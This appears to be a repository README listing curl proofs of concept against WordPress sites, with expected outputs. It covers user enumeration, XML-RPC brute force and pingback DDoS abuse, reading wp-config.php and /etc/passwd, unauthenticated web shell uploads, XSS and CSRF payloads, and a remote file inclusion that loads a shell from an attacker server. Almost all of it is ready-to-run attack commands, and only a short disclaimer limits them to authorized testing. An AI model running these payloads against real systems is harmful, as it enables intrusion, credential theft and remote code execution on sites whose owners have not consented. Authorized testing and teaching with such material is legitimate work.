This repository contains a collection of Proof of Concepts (PoCs) for exploiting common vulnerabilities in WordPress core, plugins, or misconfigurations. The PoCs are designed to be simple and executed via curl.
curlinstalled on your system.- (Optional)
jqfor parsing JSON responses.
Extracts a list of usernames using the WordPress REST API.
curl -s "http://[TARGET_DOMAIN]/wp-json/wp/v2/users" | jqA JSON object containing user IDs and usernames.
Abuses the XML-RPC pingback.ping method to potentially find vulnerable endpoints or for DDoS amplification.
curl -X POST "http://[TARGET_DOMAIN]/xmlrpc.php" -d '<?xml version="1.0"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://[VICTIM_SITE]</string></value></param>
<param><value><string>http://[TARGET_DOMAIN]</string></value></param>
</params>
</methodCall>'A response indicating whether the target site is vulnerable to pingback abuse.
Some plugins/themes expose sensitive files, such as configuration or backup files.
curl -s "http://[TARGET_DOMAIN]/wp-content/plugins/[PLUGIN_NAME]/debug.log"Contents of the exposed file (if available).
Checks for publicly accessible directories due to server misconfigurations.
curl -s "http://[TARGET_DOMAIN]/wp-content/uploads/" | grep "<title>"HTML content indicating a directory listing page.
Attempts to brute force login credentials via the XML-RPC method, which is commonly vulnerable to brute-force attacks.
curl -X POST "http://[TARGET_DOMAIN]/xmlrpc.php" -d '<?xml version="1.0"?>
<methodCall>
<methodName>wp.login</methodName>
<params>
<param><value><string>[USERNAME]</string></value></param>
<param><value><string>[PASSWORD]</string></value></param>
</params>
</methodCall>'Response showing either a successful login or failure message.
Brute forces paths to access the wp-admin login page, useful for misconfigurations or hidden paths.
curl -s -o /dev/null -w "%{http_code}" "http://[TARGET_DOMAIN]/wp-admin/"A 200 status code if the wp-admin login page exists.
Some plugins/themes allow unauthenticated file uploads that could lead to Remote Code Execution (RCE) or web shell uploads.
curl -F "file=@[FILE_PATH]" "http://[TARGET_DOMAIN]/wp-content/plugins/[PLUGIN_NAME]/upload.php"Confirmation that the file was uploaded or error message.
Exploits a misconfiguration to expose the wp-config.php file, which contains sensitive database credentials.
curl -s "http://[TARGET_DOMAIN]/wp-config.php"Contents of the wp-config.php file, revealing database credentials.
Bypasses login pages through known misconfigurations or vulnerabilities.
curl -X POST "http://[TARGET_DOMAIN]/wp-login.php" -d "log=[USERNAME]&pwd=[PASSWORD]&wp-submit=Log+In&redirect_to=http%3A%2F%2F[TARGET_DOMAIN]%2Fwp-admin%2F"Response showing if the login was successful.
Exploits XSS vulnerabilities in WordPress plugins by injecting malicious JavaScript into vulnerable plugin fields.
curl -X POST "http://[TARGET_DOMAIN]/wp-admin/options-general.php?page=[PLUGIN_PAGE]" -d "setting=<script>alert('XSS')</script>"JavaScript alert showing the XSS payload execution.
Exploits CSRF vulnerabilities by forcing an admin user to perform unintended actions on their WordPress site.
curl -X POST "http://[TARGET_DOMAIN]/wp-admin/admin-post.php" -d "action=[ACTION_NAME]&[PARAMETERS]"Admin action is performed without proper authentication.
Exploits LFI vulnerabilities through URL parameters to include sensitive files like /etc/passwd or wp-config.php.
curl -s "http://[TARGET_DOMAIN]/wp-content/themes/[THEME_NAME]/[VULNERABLE_FILE].php?page=../../../../../../etc/passwd"Contents of the sensitive file, like /etc/passwd.
Exploits vulnerable include statements to execute remote files, typically used for web shell uploads or remote code execution.
curl -s "http://[TARGET_DOMAIN]/wp-content/themes/[THEME_NAME]/[VULNERABLE_FILE].php?file=http://[ATTACKER_SERVER]/shell.php"The remote shell being executed on the target server.
Exploits insecure deserialization vulnerabilities in WordPress plugins or themes that fail to properly validate user inputs.
curl -X POST "http://[TARGET_DOMAIN]/wp-admin/admin-ajax.php" -d "action=deserialize&data=[MALICIOUS_PAYLOAD]"Successful deserialization leading to code execution or privilege escalation.
- Replace
[TARGET_DOMAIN],[USERNAME],[PASSWORD],[PLUGIN_NAME],[FILE_PATH], etc., with actual values. - Use these PoCs responsibly and only on systems you are authorized to test.
- For JSON responses, you can omit
| jqif you don't have the tool installed.
This toolkit is for educational and authorized penetration testing purposes only. Misuse of this information can result in severe legal consequences.
If you find this work helpful, you can support me:
Thanks for your support! ❤️